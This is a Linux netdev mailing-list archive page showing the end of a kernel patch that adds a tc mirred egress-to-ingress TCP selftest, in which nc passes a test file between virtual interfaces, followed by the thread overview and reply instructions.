+			action ct commit nat dst addr 192.0.2.1 pipe \\
+			action ct clear pipe \\
+			action skbedit ptype host pipe \\
+			action mirred ingress redirect dev $h1
+
+	ip vrf exec v$h1 nc --recv-only -w10 -l -p 12345 -o $tmpfile1 &
+	local rpid=$!
+	ip vrf exec v$h1 nc -w1 --send-only 192.0.2.2 12345 <$tmpfile
+	wait -n $rpid
+	cmp -s $tmpfile $tmpfile1
+	check\_err $? "server output check failed"
+	tc filter del dev $h1 egress protocol ip pref 100 handle 100 flower
+	rm -f $tmpfile $tmpfile1
+	log\_test "mirred\_egress\_to\_ingress\_tcp"
+}
+
 setup\_prepare()
 {
 	h1=${NETIFS\[p1\]}
-- 
2.37.2

next             reply	other threads:\[~2022-09-23 15:14 UTC|newest\]

**Thread overview:** 5+ messages / expand\[flat|nested\]  mbox.gz  Atom feed  top
**2022-09-23 15:11 Davide Caratti \[this message\]**
2022-09-25 18:08 \` \[PATCH net\] net/sched: act\_mirred: use the backlog for mirred ingress Cong Wang
2022-10-04 17:40   \` Davide Caratti
2022-10-16 17:28     \` Cong Wang
2022-11-18 23:07 \` Peilin Ye

**Reply instructions:**

You may reply publicly to this message via plain-text email
using any one of the following methods:

\* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting\_style#Interleaved\_style

\* Reply using the **\--to**, **\--cc**, and **\--in-reply-to**
  switches of git-send-email(1):

  git send-email \\
    --in-reply-to=33dc43f587ec1388ba456b4915c75f02a8aae226.1663945716.git.dcaratti@redhat.com \\
    --to=dcaratti@redhat.com \\
    --cc=jhs@mojatatu.com \\
    --cc=jiri@resnulli.us \\
    --cc=marcelo.leitner@gmail.com \\
    --cc=netdev@vger.kernel.org \\
    --cc=pabeni@redhat.com \\
    --cc=wizhao@redhat.com \\
    --cc=xiyou.wangcong@gmail.com \\
    /path/to/YOUR\_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

\* If your mail client supports setting the **In-Reply-To** header
  via mailto: links, try the mailto: link

Be sure your reply has a **Subject:** header at the top and a blank line before the message body.

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).

Search

lenovo warranty check/lookup | check warranty status | lenovo support us